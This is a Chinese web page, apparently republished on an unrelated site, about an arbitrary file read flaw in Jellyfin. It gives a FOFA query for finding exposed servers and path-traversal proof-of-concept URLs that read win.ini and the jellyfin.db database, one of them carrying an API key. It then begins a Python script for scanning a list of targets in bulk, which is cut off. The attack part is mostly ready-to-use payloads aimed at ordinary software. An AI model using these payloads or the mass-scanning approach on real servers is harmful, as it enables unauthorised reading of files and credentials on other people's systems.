Jellyfin任意文件读取漏洞(CVE |
您所在的位置:网站首页 › 茄子装起来了还能吃吗有毒吗 › Jellyfin任意文件读取漏洞(CVE |
|
FOFA语句: title="Jellyfin" 可以通过访问 http:///Audio/anything/hls//stream.mp3/读取任意文件。 POC: http://xxx.xxx.xxx.xxx/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ Content-Type: application/octet-stream 其它URL: /Audio/anything/hls/..\data\jellyfin.db/stream.mp3/ /Videos/anything/hls/m/..\data\jellyfin.db /Videos/anything/hls/..\data\jellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7batch.py(python3) #批量ip import requests import sys import urllib3 urllib3.disable_warnings() if len(sys.argv)!=2: print('Usage: python3 xxx.py urls.txt') |
今日新闻 |
推荐新闻 |
| CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |